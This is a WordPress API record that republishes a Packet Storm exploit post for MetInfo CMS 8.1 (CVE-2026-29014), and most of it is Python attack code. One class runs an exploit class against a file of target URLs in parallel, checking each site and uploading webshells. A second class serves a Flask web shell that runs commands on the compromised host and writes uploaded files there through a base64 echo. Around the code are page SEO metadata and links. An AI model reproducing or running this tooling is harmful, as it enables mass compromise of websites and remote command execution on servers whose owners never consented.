{"id":49291,"date":"2026-04-24T16:47:53","date_gmt":"2026-04-24T16:47:53","guid":{"rendered":"http:\/\/localhost\/?p=49291"},"modified":"2026-04-24T16:47:53","modified_gmt":"2026-04-24T16:47:53","slug":"metinfo-cms-81-shell-upload-mass-exploiter","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=49291","title":{"rendered":"\ud83d\udcc4 MetInfo CMS 8.1 Shell Upload Mass Exploiter_PACKETSTORM:219759"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-24T20:46:21&#8243;,&#8221;description&#8221;:&#8221;This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-24T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-24T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MetInfo CMS 8.1 Shell Upload Mass Exploiter&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219759&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-29014&#8243;],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================\\n    | # Title     : MetInfo CMS 8.1 Mass Exploitation \\u0026 Web Shell Framework                                                          |\\n    | # Author    : indoushka                                                                                                        |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\\n    | # Vendor    : https:\/\/www.metinfo.cn                                                                                           |\\n    ==================================================================================================================================\\n    \\n    [+] Summary    : This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014.\\n    \\n    [+] POC        :  \\n    \\n    #!\/usr\/bin\/env python3\\n    \\n    import threading\\n    import queue\\n    import json\\n    from concurrent.futures import ThreadPoolExecutor, as_completed\\n    \\n    \\n    class MetInfoMassExploit:\\n        \\&#8221;\\&#8221;\\&#8221;Mass exploitation for multiple targets\\&#8221;\\&#8221;\\&#8221;\\n    \\n        def __init__(self, targets_file, threads=10, output_file=None, exploit_class=None):\\n            self.targets = self.load_targets(targets_file)\\n            self.threads = threads\\n            self.output_file = output_file\\n            self.results = []\\n            self.lock = threading.Lock()\\n            self.exploit_class = exploit_class\\n    \\n        def load_targets(self, file_path):\\n            \\&#8221;\\&#8221;\\&#8221;Load targets from file\\&#8221;\\&#8221;\\&#8221;\\n            targets = []\\n            with open(file_path, &#8216;r&#8217;) as f:\\n                for line in f:\\n                    line = line.strip()\\n                    if line and not line.startswith(&#8216;#&#8217;):\\n                        targets.append(line)\\n            return targets\\n    \\n        def exploit_single(self, target_url):\\n            \\&#8221;\\&#8221;\\&#8221;Exploit a single target\\&#8221;\\&#8221;\\&#8221;\\n            try:\\n                if not self.exploit_class:\\n                    return None\\n    \\n                exploit = self.exploit_class(target_url, verbose=False)\\n    \\n                if exploit.check_vulnerability():\\n                    result = {\\n                        &#8216;url&#8217;: target_url,\\n                        &#8216;vulnerable&#8217;: True\\n                    }\\n    \\n                    if hasattr(exploit, \\&#8221;get_system_info\\&#8221;):\\n                        try:\\n                            result[&#8216;info&#8217;] = exploit.get_system_info()\\n                        except:\\n                            result[&#8216;info&#8217;] = None\\n    \\n                    if hasattr(exploit, \\&#8221;upload_webshell\\&#8221;):\\n                        try:\\n                            webshell = exploit.upload_webshell()\\n                            if webshell:\\n                                result[&#8216;webshell&#8217;] = webshell\\n                        except:\\n                            pass\\n    \\n                    self.log_result(result)\\n                    return result\\n    \\n                else:\\n                    self.log_result({&#8216;url&#8217;: target_url, &#8216;vulnerable&#8217;: False})\\n                    return None\\n    \\n            except Exception as e:\\n                self.log_result({\\n                    &#8216;url&#8217;: target_url,\\n                    &#8216;vulnerable&#8217;: False,\\n                    &#8216;error&#8217;: str(e)\\n                })\\n            return None\\n    \\n        def log_result(self, result):\\n            \\&#8221;\\&#8221;\\&#8221;Log result with thread safety\\&#8221;\\&#8221;\\&#8221;\\n            with self.lock:\\n                self.results.append(result)\\n    \\n                if result.get(&#8216;vulnerable&#8217;):\\n                    print(f\\&#8221;[+] VULNERABLE: {result.get(&#8216;url&#8217;)}\\&#8221;)\\n                    if result.get(&#8216;webshell&#8217;):\\n                        print(f\\&#8221;    Webshell: {result.get(&#8216;webshell&#8217;)}\\&#8221;)\\n                else:\\n                    print(f\\&#8221;[-] Not vulnerable: {result.get(&#8216;url&#8217;)}\\&#8221;)\\n    \\n        def run(self):\\n            \\&#8221;\\&#8221;\\&#8221;Run mass exploitation\\&#8221;\\&#8221;\\&#8221;\\n            print(f\\&#8221;[*] Loaded {len(self.targets)} targets\\&#8221;)\\n            print(f\\&#8221;[*] Using {self.threads} threads\\&#8221;)\\n    \\n            with ThreadPoolExecutor(max_workers=self.threads) as executor:\\n                futures = [\\n                    executor.submit(self.exploit_single, url)\\n                    for url in self.targets\\n                ]\\n    \\n                for future in as_completed(futures):\\n                    try:\\n                        future.result()\\n                    except Exception:\\n                        pass\\n            if self.output_file:\\n                with open(self.output_file, &#8216;w&#8217;) as f:\\n                    json.dump(self.results, f, indent=2)\\n    \\n                print(f\\&#8221;[*] Results saved to {self.output_file}\\&#8221;)\\n    \\n            vulnerable_count = sum(1 for r in self.results if r.get(&#8216;vulnerable&#8217;))\\n            print(f\\&#8221;\\\\n[*] Summary: {vulnerable_count}\/{len(self.targets)} targets vulnerable\\&#8221;)\\n    class MetInfoWebShell:\\n        \\&#8221;\\&#8221;\\&#8221;Web-based shell interface using Flask\\&#8221;\\&#8221;\\&#8221;\\n    \\n        def __init__(self, exploit_instance):\\n            self.exploit = exploit_instance\\n            self.app = None\\n    \\n        def start(self, host=&#8217;0.0.0.0&#8242;, port=8080):\\n            \\&#8221;\\&#8221;\\&#8221;Start web shell server\\&#8221;\\&#8221;\\&#8221;\\n            try:\\n                from flask import Flask, request, render_template_string\\n                import base64  # FIX: missing import\\n    \\n                app = Flask(__name__)\\n    \\n                TEMPLATE = &#8221;&#8217;\\n                \\u003chtml\\u003e\\n                \\u003cbody\\u003e\\n                \\u003ch2\\u003eMetInfo Web Shell\\u003c\/h2\\u003e\\n    \\n                \\u003cform method=\\&#8221;post\\&#8221;\\u003e\\n                    \\u003cinput type=\\&#8221;text\\&#8221; name=\\&#8221;cmd\\&#8221;\\u003e\\n                    \\u003cinput type=\\&#8221;submit\\&#8221;\\u003e\\n                \\u003c\/form\\u003e\\n    \\n                {% if output %}\\n                \\u003cpre\\u003e{{ output }}\\u003c\/pre\\u003e\\n                {% endif %}\\n                \\u003c\/body\\u003e\\n                \\u003c\/html\\u003e\\n                &#8221;&#8217;\\n    \\n                @app.route(&#8216;\/&#8217;, methods=[&#8216;GET&#8217;, &#8216;POST&#8217;])\\n                def index():\\n                    output = \\&#8221;\\&#8221;\\n    \\n                    if request.method == &#8216;POST&#8217;:\\n                        if &#8216;cmd&#8217; in request.form:\\n                            cmd = request.form[&#8216;cmd&#8217;]\\n                            output = self.exploit.execute_command(cmd) or \\&#8221;\\&#8221;\\n    \\n                        elif &#8216;file&#8217; in request.files:\\n                            file = request.files[&#8216;file&#8217;]\\n                            if file and file.filename:\\n                                content = file.read()\\n                                b64_content = base64.b64encode(content).decode()\\n    \\n                                remote_path = f\\&#8221;\/tmp\/{file.filename}\\&#8221;\\n                                self.exploit.execute_command(\\n                                    f\\&#8221;echo &#8216;{b64_content}&#8217; | base64 -d \\u003e {remote_path}\\&#8221;\\n                                )\\n                                output = f\\&#8221;Uploaded to {remote_path}\\&#8221;\\n    \\n                    return render_template_string(TEMPLATE, output=output)\\n    \\n                self.app = app\\n                print(f\\&#8221;[*] Web shell started at http:\/\/{host}:{port}\\&#8221;)\\n                app.run(host=host, port=port)\\n    \\n            except ImportError:\\n                print(\\&#8221;[-] Flask not installed\\&#8221;)\\n    \\t\\n    Greetings to :==============================================================================\\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n    ============================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/219759&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/219759\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-24T20:46:21&#8243;,&#8221;description&#8221;:&#8221;This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-24T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-24T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MetInfo&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-49291","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 MetInfo CMS 8.1 Shell Upload Mass Exploiter_PACKETSTORM:219759 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=49291\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 MetInfo CMS 8.1 Shell Upload Mass Exploiter_PACKETSTORM:219759 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-24T20:46:21&#8243;,&#8221;description&#8221;:&#8221;This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-24T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-24T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MetInfo...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=49291\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-24T16:47:53+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49291#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49291\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 MetInfo CMS 8.1 Shell Upload Mass Exploiter_PACKETSTORM:219759\",\"datePublished\":\"2026-04-24T16:47:53+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49291\"},\"wordCount\":970,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=49291#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49291\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49291\",\"name\":\"\ud83d\udcc4 MetInfo CMS 8.1 Shell Upload Mass Exploiter_PACKETSTORM:219759 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-24T16:47:53+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49291#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=49291\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49291#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 MetInfo CMS 8.1 Shell Upload Mass Exploiter_PACKETSTORM:219759\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 MetInfo CMS 8.1 Shell Upload Mass Exploiter_PACKETSTORM:219759 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=49291","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 MetInfo CMS 8.1 Shell Upload Mass Exploiter_PACKETSTORM:219759 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-24T20:46:21&#8243;,&#8221;description&#8221;:&#8221;This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-24T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-24T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MetInfo...","og_url":"https:\/\/zero.redgem.net\/?p=49291","og_site_name":"zero redgem","article_published_time":"2026-04-24T16:47:53+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=49291#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=49291"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 MetInfo CMS 8.1 Shell Upload Mass Exploiter_PACKETSTORM:219759","datePublished":"2026-04-24T16:47:53+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=49291"},"wordCount":970,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=49291#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=49291","url":"https:\/\/zero.redgem.net\/?p=49291","name":"\ud83d\udcc4 MetInfo CMS 8.1 Shell Upload Mass Exploiter_PACKETSTORM:219759 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-24T16:47:53+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=49291#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=49291"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=49291#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 MetInfo CMS 8.1 Shell Upload Mass Exploiter_PACKETSTORM:219759"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/49291","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=49291"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/49291\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=49291"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=49291"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=49291"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}